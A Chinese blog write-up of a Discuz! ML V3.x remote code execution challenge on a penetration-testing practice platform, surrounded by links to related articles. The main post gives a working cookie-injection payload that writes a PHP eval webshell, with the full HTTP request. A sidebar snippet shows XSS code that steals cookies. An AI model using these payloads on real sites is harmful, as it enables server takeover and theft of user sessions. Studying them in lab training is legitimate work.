安鸾渗透实战平台(CMS系列)—— Discuz (150分)

最新推荐文章于 2023-08-30 21:32:33 发布
最新推荐文章于 2023-08-30 21:32:33 发布
阅读量1.9k 收藏 5
点赞数 1
分类专栏: 安鸾渗透实战平台 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50985113/article/details/124492671
版权

漏洞环境

安鸾渗透实战平台
火狐代理插件(foxyproxy)
burp suitepro(抓包工具)
中国蚁剑(webshell管理工具)

题目

在这里插入图片描述

情况分析

1、访问网页,右下角有CMS版本名称和版本号

在这里插入图片描述

2、使用搜索引擎去查看历史漏洞

在这里插入图片描述在这里插入图片描述

3、挑选一个进行测试

用一个远程代码执行的:
1.Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。
2.产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。
3.影响版本:
Discuz! ML V3.2
Discuz! ML V3.3
Discuz! ML V3.4
4、poc测试
_language=sc'.phpinfo().'

可以看出sc后面的参数是可以被php解析执行的。在这里插入图片描述
构造一个webshell并写入网站当前文件夹中

'.file_put_contents(shell.php,urldecode(<?php eval($_POST["cmd"]);?>)).'

完整数据包为:

GET /forum.php HTTP/1.1
Host: 47.100.220.113:8043
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: yGa2_2132_saltkey=A9SEpJxw; yGa2_2132_language=sc'.file_put_contents(shell.php,urldecode(<?php eval($_POST["cmd"]);?>)).'; yGa2_2132_lastvisit=1651200172; yGa2_2132_sid=DFqJfB; yGa2_2132_lastact=1651203772%09home.php%09misc; yGa2_2132_onlineusernum=1; yGa2_2132_sendmail=1
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

在这里插入图片描述

5、使用webshell工具连接

虽然返回500,但是应该是上传成功了,由于我们是通过php函数创建了一个shell.php这里我们直接访问试试

在这里插入图片描述
通过蚁剑访问
在这里插入图片描述在这里插入图片描述在这里插入图片描述

在这里插入图片描述

阿文、...
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
搭建discuz论坛并攻破盗取数据库
Cwillchris的博客
07-27 604
b、使用/utility/convert/index.php进行版本转换时,会自动创建utility/convert/data/config.inc.php文件。保存好这个地址/var/www/html/discuz/utility/convert/data/192.168.98.66_MySQL.sql。注/var/www/html/utility/convert/data/config.inc.php这个文件原来的网站上没有的。echo"helloworld";...
安鸾CMS系列Discuz
柠鹿的轨迹
11-28 2983
安鸾CMS系列Discuz
安鸾渗透实战平台(CMS系列)—— ecshop (200)
weixin_50985113的博客
04-29 2840
漏洞环境 安鸾渗透实战平台 python 3 中国蚁剑(webshell管理工具) 题目 情况析 1、访问网页,最下面也有版本信息泄露 2、信息收集 3、找到一个公用POC,用python执行的 #!/usr/bin/python # -*- coding: utf-8 -*- import requests import time a="554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x
安鸾渗透实战平台cms系列)wordpress01 (200)
weixin_50985113的博客
02-02 484
安鸾渗透实战平台公网云主机一台(用来接收反弹shell和发送文件)
记一次对Discuz官方论坛的渗透检测
kendyhj9999的专栏
04-16 1542
前言: 此次检测纯属偶然, 源于Errorera同学一直想拿下腾讯, 然后找腾讯换ipad玩, 结果搞着搞着就把目标对准Discuz了, 反正Discuz也属于腾讯业务, 估计搞下也能换ipad, Errorera同学怀着这样的美好愿望就开搞了! http://hi.baidu.com/chaizp/item/a899121dd8bba60db98a1aab 此文所有图片均由Err
网络安全 宽字节注入 CMS网站渗透实战 学术交流
12-05
web安全初学者,跟着公开课学习了一段时间,第一次在靶场环境下,边查询边过关,请教了不少人,对blueCMS系统存在的宽字节注入漏洞成功进入后台,找到后台文件编写路径,写入一句话木马,通过蚁剑连接成功后,开始提...
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
帝国CMS——会员签到插件.zip
06-12
帝国CMS——会员签到插件.zip
CMS.rar_cms注册_内容管理平台
09-24
该网站是一个实现基本功能的CMS内容管理平台,包含用户注册登录,内容显示,相关内容查询等功能。
各大CMS网站模板--练习web渗透必备.zip
12-11
不错的靶场,即能练习网站搭建,又能熟悉网站结构,都有助于提高我们的web测试能力!所以这是一个不错的资源,希望对大家有所帮助!
渗透测试之Discuz的环境搭建
LKmnbZ's Blog
11-14 372
1. 下载软件 官网http://download.comsenz.com/DiscuzX/ 下载后解压缩 放到PHPStudy的安装目录的WWW下面 PHPStudy环境搭建详见https://blog.csdn.net/qq_37077262/article/details/102945140 2. 开始安装 浏览器中运行install程序 即...
靶场测试--安鸾渗透实战平台
ID_xiaomage的博客
09-13 2083
CMS系列-Discuz 题目URL:http://whalwl.host:8042/forum.php(tips:flag在网站根目录下) 文章目录CMS系列-Discuz前言一、利用Burp进行抓取数据包二、将数据包发送到Repeater1.构造请求参数验证漏洞是否存在2.利用Cookie信息上传Shell3.可以使用AntSword、Chopper或者Behinder进行连接,这里使用的是AntSword总结 前言 漏洞描述 Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求
安鸾CMS系列之Wordpress02
柠鹿的轨迹
02-22 3126
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本文首发于涂寐’s Blogs:https://0xtlu.github.io/article/52122537.html 度娘找到相关 Nday,针对 WordPress 4.9.8 拿 WPScan 扫用户名,得到 author 和 admin。author 无效,拿 admin 爆破到天荒地老……
Webservice之应用协议SOAP
心火燃烧!
11-08 586
什么是SOAP? SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息。或者更简单地说:SOAP 是用于访问网络服务的协议。 SOAP 指简易对象访问协议 SOAP 是一种通信协议 SOAP 用于应用程序之间的通信 SOAP 是一种用于发送消息的格式 SOAP 被设计用来通过因特网进行通信 SOAP 独立于平台 SOAP 独立于语言 SOAP 基于 XML SOAP...
记一次对DZ的渗透.(一句话木马与图片,文件上传解析漏洞)
键盘的起始页
01-11 1557
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 文件上传后导致的常见安全问题一般有: 1)上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行。 2)上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为(其他通过类似方式控制策
xss漏洞php注射实战,利用XSS渗透DISCUZ 6.1.0实战
weixin_42347699的博客
03-11 174
论坛——>入侵者布置的跨站攻击——>转移被入侵这视线(隐蔽)论坛插入脚本:var img = new Image();img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);但是我不一样,因为他需要诱导人去点击他的链接,但是现在人不是傻子,不会轻易点你的链接。而我是要把脚步插入论坛页面中,这样既隐蔽又省去了诱导的力气我插...
基于某商城CMS的渗透测试
rumil的博客
06-12 1111
 检索ip信息,获取网站的信息  发现22端口存在高危  御剑扫描端口信息  发现开放以上端口信息  nmap扫描信息 扫描出来端口的信息:  扫描目录 状态码为200的:其他目录信息:  刚刚信息收集,发现22端口开放,存在高危,尝试弱口令爆破  连接失败,说明可能不是弱口令  尝试弱口令爆破数据库  同样没有检查出,可能不存在弱口令 尝试登录后台:  尝试输入账
XSS:交友平台XSS漏洞
zh的博客
10-11 482
靶场地址:http://www.whalwl.top:8033 解题准备:本题需要破解验证码,php和python脚本均可 解题思路: 1、注册,登录,出现两个链接 两个都点开看看,第一个是更新资料页面,尝试XSS弹窗 发现输入的代码原样显示,并没有起作用,此页面没有源代码,只能查看元素 发现一对可疑元素<textarea></textarea>包括了输入的代码。 于是先尝试闭合这个元素,点击更新,成功弹窗。 </textarea>a..
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现)
Continuejww的博客
08-30 1578
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞。
web渗透测试靶场cms
最新发布
09-06
你可以尝试一些知名的Web渗透测试靶场CMS,如DVWA(Damn Vulnerable Web Application)、OWASP Juice Shop和WebGoat。这些靶场CMS都是为了帮助安全专业人员和开发者学习和实践Web渗透测试技术而设计的,它们提供了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值